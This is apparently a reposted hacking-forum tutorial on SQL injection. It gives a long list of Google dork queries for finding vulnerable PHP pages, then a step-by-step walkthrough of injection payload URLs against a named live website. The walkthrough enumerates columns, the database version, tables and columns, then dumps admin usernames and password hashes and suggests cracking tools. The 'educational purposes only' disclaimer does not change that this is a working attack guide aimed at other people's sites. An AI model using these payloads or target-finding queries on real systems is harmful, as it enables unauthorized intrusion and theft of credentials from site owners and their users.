Minggu, 23 Mei 2010

SQL INJECTION image based tutorial

know what you're thinking. "Another SQL Tut? Really, Az, did we need another?" Well..Yes. When I was learning I had to read 4 or 5 tuts to actually get it to work. Im hoping that this tutorial will help more.

SQL INJECTION

Azreayl are responsible for what you do with this information, it is provided for educational purposes only.

Before we even start, you need some tools.
HackBar [FireFox]
Admin Finder [We wont be using the AdminFinder in this tut, but you WILL need it]

Now, we need a site. To find a site, we need to go to Google, and put in one of the following.

Spoiler (Click to Hide)
allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
allinurl:profile_view.php?id=
allinurl:category.php?id=
allinurl:publications.php?id=
allinurl:fellows.php?id=
allinurl:downloads_info.php?id=
allinurl:prod_info.php?id=
allinurl:shop.php?do=part&id=
allinurl:productinfo.php?id=
allinurl:collectionitem.php?id=
allinurl:band_info.php?id=
allinurl:product.php?id=
allinurl:releases.php?id=
allinurl:ray.php?id=
allinurl:produit.php?id=
allinurl:pop.php?id=
allinurl:shopping.php?id=
allinurl:productdetail.php?id=
allinurl:post.php?id=
allinurl:viewshowdetail.php?id=
allinurl:clubpage.php?id=
allinurl:memberInfo.php?id=
allinurl:section.php?id=
allinurl:theme.php?id=
allinurl:page.php?id=
allinurl:shredder-categories.php?id=
allinurl:tradeCategory.php?id=
allinurl:product_ranges_view.php?ID=
allinurl:shop_category.php?id=
allinurl:transcript.php?id=
allinurl:channel_id=
allinurl:item_id=
allinurl:newsid=
allinurl:trainers.php?id=
allinurl:news-full.php?id=
allinurl:news_display.php?getid=
allinurl:index2.php?option=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:newsone.php?id=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:aboutbook.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:pages.php?id=
allinurl:clanek.php4?id=
allinurl:announce.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:viewapp.php?id=
allinurl:viewphoto.php?id=
allinurl:rub.php?idr=
allinurl:galeri_info.php?l=
allinurl:review.php?id=
allinurl:iniziativa.php?in=
allinurl:curriculum.php?id=
allinurl:labels.php?id=
allinurl:story.php?id=
allinurl:look.php?ID=
allinurl:newsone.php?id=
allinurl:aboutbook.php?id=
To check if a site is vulnerable, put a ' after it, like so:
Code:
http://www.site.com/news.php?id=5'
You should get an SQL error, like this one:
Code:
PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\Domains\tartanarmy.com\wwwroot\news\news.php on line 19 PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\Domains\tartanarmy.com\wwwroot\news\news.php on line 25

Okay, Now that you have your vulnerable site, Ill show you how to do an SQL injection on it.
Ill be doing my injection on
Code:
http://www.tartanarmy.com/news/news.php?id=130

So, I pull up my site, and I add a ' after it, and I get this.
Remember, when checking the vulnerability, an error is a good thing.
Now, I need to find out how many columns are in the site. So I start with:
Code:
http://www.tartanarmy.com/news/news.php?id=130 order by 3
Always start with 3, because a site has to have atleast 3 columns. If you get an error at 3, then your target site doesnt support union statements.
When I order by 3 I get this:
So the site has more than 3 columns. Thats a good sign. After 3, I always go to ten. So:
Code:
http://www.tartanarmy.com/news/news.php?id=130 order by 10
And I get this :
So the site has less than 10 columns. It turns out that this site had 6 columns. So now we need to know which of those columns are vulnerable. So we do this :
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,5,6
NOTICE THE - IN FRONT OF THE 130. It is very important and needs to be there every time you do a Union select statement. So on our site we get this ::
Spoiler (Click to Hide)
[Image: 87528956.png][/IMG]
Columns 2,4,and 5 are vulnerable.
Now we have to find out the SQL version of the site. Version 5 is our favorite, because it has information.schema. Information.schema is our friend, because it tells us things. Meaning we dont have to guess the table names, like we would in version 4. So to find out what version our site is running, we do this :
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,@@version,6
Now that we've done that, our site shows this :
Yay! Our site is running version 5. So how are we gonna get the tables? Just like this.
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(table_name),6  from information_schema.tables where table_schema= database ()
So on our site, you see this :
See where it says tar_admin? Thats what we want. But how are we gonna get the info thats in there? Like this. *If you downloaded the hackbar, like I told you to, your gonna need it*
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6  from information_schema.columns where table_name= tar_admin
So, tar_admin is what we want to get into, but putting it just like that wont work. We need too convert it into CHAR (). The HackBar can do that. Highlight what you want to turn into CHAR () and click MySQL, then MYSQL CHAR ().
Code:
tar_admin = CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)

So the whole thing is :
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6  from information_schema.columns where table_name= CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)

So we do that, and our site shows us this :
Out of that, we want the username and password, right? So, to get that, we do this :
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6 from tar_admin
0x3a is the Hex for a colon, so dont worry about that.
When we input that, our site shows us this :
You guys know what that is? Thats the usernames and the MD5 encrypted passwords. The passwords arent always encrypted. With this particular site, I had bad luck, as the MD5 was salted. Use Cain And Abel or John The Ripper (linux) to crack md5.

DO NOT POST ANYWHERE EXCEPT HACKFORUMS OR HackForums WITHOUT GIVING ME CREDIT.
I hope you enjoyed my tutorial, and I hope that this works for everyone. Post questions or comments here, thanks.
-Az
Diposting oleh di